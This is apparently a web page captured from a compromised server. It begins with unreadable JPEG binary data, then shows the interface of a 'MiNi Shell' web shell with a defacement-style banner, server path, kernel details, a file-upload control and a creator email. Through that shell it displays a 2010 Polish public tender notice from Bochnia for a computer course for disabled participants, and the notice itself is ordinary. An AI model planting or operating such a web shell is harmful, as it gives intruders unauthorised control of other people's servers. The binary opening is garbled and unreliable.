JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101018/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101018/335326-N-2010.html

<p class="kh_header"><b>Bochnia: Zorganizowanie i przeprowadzenie integracyjnego kursu komputerowego dla osób niepełnosprawnych - uczestników projektu pn Wzmacnianie integracji społecznej w Powiecie Bocheńskim</b><br>
<b>Numer ogłoszenia: 335326 - 2010; data zamieszczenia: 18.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , ul. G. Windakiewicza 9/5, 32-700 Bochnia, woj. małopolskie, tel. 14 611 97 40, faks 14 611 97 40.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie integracyjnego kursu komputerowego dla osób niepełnosprawnych - uczestników projektu pn Wzmacnianie integracji społecznej w Powiecie Bocheńskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa w zakresie przeprowadzania integracyjnego kursu komputerowego dla 38 osób niepełnosprawnych, wśród których jedna jest osobą niewidomą, a 10 porusza się na wózkach inwalidzkich, będących uczestnikami projektu pn. Wzmacnianie integracji społecznej w Powiecie Bocheńskim. Mając na względzie osoby niepełnosprawne poruszające się na wózkach inwalidzkich oraz osobę niewidomą będące uczestnikami ww projektu, wykonawca ma obowiązek dostosować miejsce prowadzenia integracyjnego kursu oraz program kursu do stopnia ich sprawności. Uczestnicy kursu integracyjnego mają niski poziom kompetencji w zakresie posługiwania się komputerem i Internetem, są nieaktywne lub aktywne w ograniczonym zakresie społeczno-zawodowym i z niską samooceną. 
Celem integracyjnego kursu komputerowego jest stworzenie warunków sprzyjających integracji uczestników o różnym stopniu sprawności psychofizycznej, przełamanie barier i uprzedzeń wzajemnych oraz umożliwienie treningu komunikacji interpersonalnej i pracy w zespole. Stworzenie serdecznej atmosfery w czasie zajęć powinno sprawić, że uczestnicy wyzbywają się początkowo zakłopotania i nabierają pewności siebie. 
Cele: 
1. Tworzenie warunków sprzyjających integracji uczestników;
2. Rozwijanie właściwej postawy wobec innych osób;
3. kształtowanie umiejętności nawiązywania kontaktów interpersonalnych i współpracy w grupie;
4. Nabycie umiejętności samodzielnego obsługiwania komputera, w tym edytorów tekstowych i arkuszy kalkulacyjnych, drukowania, porusza się po stronach internetowych.

Zajęcia integracyjne z wykorzystaniem komputerów nie sprowadzają się do nauczania obsługi programów informatycznych. Komputer powinien uatrakcyjnić zajęcia, stanowić przedmiot ćwiczeń kształtujących umiejętności manualne i poznawcze, a efektem zajęć powinno być nawiązanie przyjaznych stosunków między uczestnikami oraz rozwijanie umiejętności interpersonalnych i zespołowych. 
W programie integracyjnych zajęć komputerowych powinno się uwzględnić wspólnie ćwiczeń kształtujących umiejętności manualne i poznawcze a efektem zajęć powinno być nawiązanie przyjaznych stosunków między uczestnikami oraz rozwijanie umiejętności interpersonalnych i zespołowych. 
W programie integracyjnych zajęć komputerowych powinno się uwzględnić wspólnie ćwiczenia jako najłatwiejszy sposób na nawiązanie przyjaznych kontaktów między uczestnikami. Warunki prowadzenia zajęć powinny tworzyć atmosferę współpracy, która sprzyja kształtowaniu wśród uczestników zajęcia poczucia przynależności do wspólnoty. 
Metody pracy na integracyjnym kursie to: prezentacja, dyskusja, praca z komputerem. Integracyjny kurs winien odbywać się w maksymalnie w dwóch grupach, nie większych niż 20 osób - z zaznaczeniem, iż przy jednym stanowisku komputerowym powinny znajdować się nie więcej niż dwie osoby. 
Czas trwania kursu komputerowego - 30 godzin zegarowych (15 godzin na jedną grupę), w tym zajęcia teoretyczne i praktyczne, dostosowane do indywidualnych możliwości uczestników. Jedna grupa winna spotkać się w okresie realizacji zamówienia od 4 do 5 razy.  
Zajęcia powinny odbywać się w dni robocze od poniedziałku do piątku w godzinach:
1.	 dla I grupy - od 10:00 do 14:00;
2.	 dla II grupy - od 16:30 do 20.30.
Miejsce realizacji kursu musi znajdować się na terenie miasta Bochnia ze względu na połączenia komunikacji publicznej. Wykonawca jest zobowiązany zapewnić salę szkoleniową do przeprowadzenia zajęć, dostosowaną do potrzeb osób niepełnosprawnych z dysfunkcjami narządu ruchu, w tym poruszającymi 
się na wózkach inwalidzkich, wyposażoną w odpowiednią liczbę miejsc, dostosowaną do ilości uczestników wraz zapleczem sanitarnym. Wykonawca zapewni salę z odpowiednim zapleczem technicznym 
do przeprowadzenia kursu komputerowego . Sala powinna mieścić 20 osób, temperatura w sali 18-23 stopni Celsjusza.
	Wykonawca zobowiązany jest wyposażyć każdego z uczestników szkolenia w materiały szkoleniowe zgodnie z zakresem tematycznym kursu, oraz w niezbędne materiały biurowe i piśmienne tj. długopis,  zeszyt A4.
	Wykonawca zapewni uczestnikom zajęć nieodpłatny dostęp do serwisu kawowego.
Wykonawca zobowiązany będzie do zamieszczenia w dokumentacji kursu informacji o finansowaniu projektu przez Unię Europejską, a także oznakowania afiszem promocyjnym miejsca realizacji kursu.
Wykonawca winien zapewnić uczestnikom kursu warunki do nauki w oparciu o zasady BHP. Sala dydaktyczna powinna być wyposażona stosownie do potrzeb maksymalnie 20 osobowej grupy. Sala musi być wyposażona w min 10 stanowisk komputerowych, w tym jedno stanowisko dostosowane do potrzeb osoby niewidomej. Do oferty należy załączyć informację dotyczącą lokalizacji, w której realizowane będą zajęcia wraz z opisem wyposażenia sali.
	Wykonawca kursu zobowiązany będzie do przedstawienia w ofercie programu i harmonogramu realizowanych zajęć, który powinien zawierać co najmniej; nazwę i zakres zajęć, czas trwania, liczbę godzin zegarowych, sposób organizacji w tym miejsce realizacji oraz nazwisko osoby prowadzącej zajęcia 
w każdym dniu kursu.
Wymagania kadrowe: 
Pedagog, trener o wykształceniu informatycznym z co najmniej 2 letnim stażem pracy i doświadczeniem zawodowym w prowadzeniu kursów komputerowych.
	Po ukończeniu kursu Wykonawca zobowiązany będzie wydać uczestnikom zaświadczenie potwierdzające uczestnictwo w kursie. Dokument powinien posiadać stosowne oznakowanie POKL i UE, 
a jego wzór wykonawca załączy do oferty.
Ponadto wykonawca zobowiązany będzie do prowadzenia odpowiedniej dokumentacji:
b)	dzienna lista obecności uczestników kursu,
c)	dziennik zajęć zawierający wymiar godzin i tematy zajęć,
d)	listę imienną potwierdzającą odbiór materiałów szkoleniowych, biurowych i piśmiennych oraz korzystanie z bufetu kawowego,
e)	rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających udział w kursie.

Wykonawca pod rygorem utraty prawa do zapłaty za kurs, zobowiązany będzie do niezwłocznego poinformowania Zamawiającego o:
1.	nie zgłoszeniu się któregokolwiek z Uczestników kursu;
2.	przerwaniu udziału lub rezygnacji z uczestnictwa w kursie;
3.	innych sytuacjach, które mają wpływ na realizację programu kursu i umowy.

Wykonawca zobowiązany będzie do przekazania Zamawiającemu w terminie 7 dni od dnia zakończenia kursu, następujących dokumentów:
1.	oryginału imiennego wykazu osób, które uczestniczyły w kursie;
2.	kserokopii dziennika zajęć potwierdzonej za zgodność z oryginałem;
3.	kserokopii list obecności potwierdzonych za zgodność z oryginałem;
4.	kserokopii wszystkich zaświadczeń potwierdzających uczestnictwo w kursie potwierdzonych 
za zgodność z oryginałem;
5.	imiennej listy uczestników kursu potwierdzających odbiór materiałów szkoleniowych, biurowych 
i  piśmiennych oraz korzystania z bufetu kawowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.32.00-1, 85.31.12.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do rejestru ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Informacja dotycząca lokalizacji (dokładny adres) gdzie będzie realizowany przedmiot zamówienia 
2. Wykaz pomieszczeń w których będzie realizowany przedmiot zamówienia 
3. wykaz osób realizujących zamówienia wraz z dokumentami potwierdzającymi posiadane doświadczenie, wykształcenie.

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia- nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków 
o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;
b) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzające, że uzyskał przewidziane prawem zwolnienie, odroczenie lub układ ratalny dla zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków 
o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia- nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.wrotamalopolski.pl/root_BIP/BIP_w_Malopolsce/powiaty/root_bochenski/Wprowadzenie/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie w Bochni 
ul. E. Windakiewicza 9/5
32-700 Bochnia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.10.2010 godzina 11:00, miejsce: Powiatowe Centrum Pomocy Rodzinie w Bochni 
ul. E. Windakiewicza 9/5 
32-700 Bochnia 
pok nr 5 _ Dziennik Podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Wzmacnianie integracji społecznej w Powiecie Bocheńskim współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com